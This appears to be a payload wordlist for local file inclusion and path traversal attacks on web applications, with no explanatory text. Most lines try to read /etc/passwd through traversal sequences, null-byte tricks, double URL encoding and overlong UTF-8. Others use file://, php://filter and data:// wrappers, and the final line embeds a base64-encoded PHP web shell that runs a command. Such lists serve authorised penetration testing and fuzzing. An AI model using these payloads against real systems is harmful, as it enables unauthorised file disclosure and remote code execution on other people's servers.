/etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
..././..././..././..././etc/passwd
..//..//..//..//..//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
.....///.....///.....///.....///etc/passwd
../../../../../../../../../../../../../../etc/passwd
..\/..\/..\/..\/etc/passwd
/var/www/html/..//..//..//etc/passwd
/etc/passwd&
/etc/passwd%00
example.php%00.txt
/etc/passwd%00.inc
/etc/passwd%00.php
somedir/../../../../etc/passwd&ext=
..%2F..%2F..%2F..%2Fetc/passwd
..%5C..%5C..%5C..%5Cetc/passwd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%252F..%252F..%252F..%252fetc/passwd
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
../../../../etc/passwd..........................................................
file:///etc/passwd
file:%2F%2F%2Fetc%2Fpasswd
file:%252F%252F%252Fetc%252Fpasswd
file%3A///etc/passwd
file%3A%2F%2F%2Fetc%2Fpasswd
file%3A%252F%252F%252Fetc%252Fpasswd
php://filter/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
data%3A%2F%2Ftext%2Fplain%2C%3C%3Fphp%20echo%20base64_encode(file_get_contents(%E2%80%9Cindex.php%E2%80%9D))%3B%20%3F%3E
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+&cmd=whoami